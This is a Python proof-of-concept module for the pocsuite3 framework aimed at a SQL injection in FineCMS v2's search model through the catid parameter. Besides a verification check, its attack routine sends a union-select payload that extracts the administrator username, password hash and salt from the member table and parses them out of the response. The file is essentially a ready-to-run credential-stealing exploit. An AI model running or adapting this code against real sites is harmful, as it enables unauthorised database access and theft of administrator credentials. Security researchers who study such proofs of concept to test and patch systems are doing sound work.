"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin
import hashlib
import re
class DemoPOC(POCBase):
vulID = '1270' # ssvid
version = '1'
author = ['chenghs@knownsec.com']
vulDate = '2014-05-07'
createDate = '2014-05-19'
updateDate = '2014-05-19'
references = ['http://wooyun.org/bugs/wooyun-2014-059753']
name = 'Finecms 2 /models/search_model.php SQL注入漏洞 POC'
appPowerLink = 'http://dayrui.com'
appName = 'FineCMS'
appVersion = 'v2#'
vulType = 'SQL Injection'
desc = '''
models/Search_model.php 中 catid 参数未过滤带入 SQL
语句并执行,导致 SQL 注入漏洞,可以获取管理员的帐号
以及密码。
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
try:
vul_url = '/book/index.php?c=search&catid=-3'
flag = random_str()
payload = '%20union%20all%20select%20md5("{}")%23'.format(flag)
url = urljoin(self.url, vul_url+payload)
flag_md5 = hashlib.md5(flag.encode()).hexdigest()
resp = requests.get(url)
if resp.status_code == 200 and flag_md5 in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.error(str(e))
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
result = {}
try:
vul_url = '/book/index.php?c=search&catid=-3'
payload = '%20union%20select%20concat(0x2d2d2d,username,0x3a3a,password,' \
'0x3a3a,salt,0x2d2d2d)%20from%20dr_member%20limit%200,1%23'
url = urljoin(self.url, vul_url+payload)
resp = requests.get(url)
if resp.status_code == 200:
res = re.findall('\(---(.*)::([\w\d]{32})::([\w\d]+)---\)', resp.text)
if res:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = res[0][0]
result['AdminInfo']['Password'] = '{}${}'.format(res[0][1], res[0][2])
elif resp.status_code == 500:
res = re.findall(', \'---(.*)::([\w\d]{32})::([\w\d]+)---\',', resp.text)
if res:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = res[0][0]
result['AdminInfo']['Password'] = '{}${}'.format(res[0][1], res[0][2])
except Exception as e:
logger.error(str(e))
return self.parse_output(result)
def _shell(self):
pass
register_poc(DemoPOC)
暂无评论